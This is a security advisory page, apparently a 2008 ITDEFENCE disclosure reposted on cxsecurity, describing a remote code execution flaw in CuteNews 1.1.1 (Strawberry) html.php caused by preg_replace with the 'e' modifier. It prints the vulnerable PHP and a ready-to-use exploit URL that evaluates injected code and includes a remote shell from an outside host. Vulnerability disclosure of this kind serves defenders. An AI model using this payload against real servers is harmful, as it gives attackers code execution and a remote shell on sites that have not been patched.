CuteNews 1.1.1 (html.php) Remote Code Execution Vulnerability

2008-10-15 / 2008-10-16
Credit: ITDEFENCE
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

----[ CuteNews Remote Code Execution ... ITDefence.ru Antichat.ru ] Strawberry (CuteNews) Remote Code Execution Eugene Minaev underwater@itdefence.ru ___________________________________________________________________ ____/ __ __ _______________________ _______ _______________ \ \ \ / .\ / /_// // / \ \/ __ \ /__/ / / / /_// /\ / / / / /___/ \/ / / / / /\ / / / / / \/ / / / / /__ //\ \ / ____________/ / \/ __________// /__ // / /\\ \_______/ \________________/____/ 2007 /_//_/ // //\ \ \\ // // / .\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / . . \_\\________[________________________________________]_________//_//_/ . . Preg_replace with 'e' modifier allows code execution <?php $source = htmlspecialchars($text); $source = preg_replace( '/&lt;!--(.*?)--&gt;/es', '"<span style=\"color: ".$options["color"]["comment"].";\">&lt;!--". str_replace("&lt;","&lt;<!-- -->", str_replace("=","=<!-- -->", "$1")). "--&gt;</span>"', $source); ?> strawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('blackybr.nm.ru/shell'); ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top